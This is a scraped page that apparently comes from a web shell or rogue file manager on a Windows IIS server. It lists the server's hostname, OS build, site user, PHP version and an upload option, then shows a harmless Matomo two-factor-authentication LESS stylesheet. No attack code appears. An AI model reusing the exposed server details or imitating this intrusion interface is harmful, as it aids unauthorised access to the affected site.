HEX
Server: Microsoft-IIS/10.0
System: Windows NT ITPWINWEBSVR22 10.0 build 20348 (Windows Server 2022) AMD64
User: www.conferencesearch.co.uk (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: D:/web/matomo.vdk/plugins/TwoFactorAuth/stylesheets/twofactorauth.less
.twoFactorRecoveryCodes {
  li {
    font-size: 16px;
    list-style-type: disc;
    margin-left: 20px;
  }
}
.two-fa-qr-code-dialog {
  #qrcode {
    width: 200px;
    height: 200px;
    display: block;
    margin: 0 auto;
  }

  .text-code pre {
    font-size: large;
    text-align: center;
    padding: 13px;
  }

  .copyToClipboardIcon,
  .copyToClipboardIconCheck {
    margin-left: 2px;
  }
}

.loginSection {
  #qrcode,
  .backupRecoveryCodesAlert {
    margin-top: 16px;
  }
}

.userSettings2FA .twoFaStatusEnabled,
.twoFactorSetupFinished .successMessage {
  color:#43a047;
}